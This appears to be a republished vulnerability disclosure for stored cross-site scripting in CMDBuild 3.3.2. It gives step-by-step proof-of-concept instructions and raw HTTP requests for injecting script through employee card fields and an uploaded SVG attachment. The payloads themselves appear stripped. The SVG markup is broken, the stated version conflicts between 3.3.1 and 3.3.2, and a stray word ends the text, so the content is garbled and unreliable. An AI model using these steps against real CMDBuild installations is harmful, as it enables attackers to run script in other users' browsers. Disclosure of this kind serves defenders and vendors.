Published on November 16th, 2021 📆 | 8356 Views ⚑
0CMDBuild 3.3.2 Cross Site Scripting – Torchsec
# Date: 15/11/2021
# Exploit Author: Hosein Vita
# Vendor Homepage: https://www.cmdbuild.org
# Software Link: https://www.cmdbuild.org/en/download/latest-version
# Version: CMDBuild 3.3.2
# Tested on: Linux
Summary:
Multiple stored cross-site scripting (XSS) vulnerabilities in Tecnoteca CMDBuild 3.3.1 allow remote attackers to inject arbitrary web script or HTML via a crafted SVG document. The attack vectors include Add Attachment, Add Office, and Add Employee. Almost all add sections
Proof of concepts :
Stored Xss Example:
1-Login to you'r Dashboard As a low privilege user
2-Click On Basic archives and Employee
3- +Add card Employee
4- Enter your xss payload in parameters
5-On added employee click on "Open Relation Graph"
POST /cmdbuild/services/rest/v3/classes/Employee/cards?_dc=1636978977758 HTTP/1.1
...
Cmdbuild-Actionid: class.card.new.open
Cmdbuild-Requestid: f487ca06-3678-425f-8606-c6b671145353
Cmdbuild-Clientid: WL3L4mteNCU51FxhSQVzno3K
X-Requested-With: XMLHttpRequest
Content-Length: 302
Connection: close
{"_type":"Employee","_tenant":"","Code":"">","Description":null,"Surname":"">","Name":"">","Type":null,"Qualification":null,"Level":null,"Email":null,"Office":null,"Phone":null,"Mobile":null,"Fax":null,"State":null}
------------------------------------------------------------------------
File upload Xss example:
1-Click on Basic archives
2-Click on Workplace - + Add card Workplace
3-Select "attachments" icon - +Add attachment + image
4-Upload your svg file with xss payload
5-Click on preview and Right click open in new tab
Request:
POST /cmdbuild/services/rest/v3/classes/Workplace/cards/271248/attachments HTTP/1.1
Cmdbuild-Actionid: class.card.attachments.open
-----------------------------269319782833689825543405205260
Content-Disposition: form-data; name="file"; filename="kiwi.svg"
Content-Type: image/svg+xml
< ?xml version="1.0" encoding="utf-8"?>
< !DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
width="300"612px" height="400"502.174px" viewBox="0 65.326 612 502.174" enable-background="new 0 65.326 612 502.174"
xml:space="preserve">
Gloss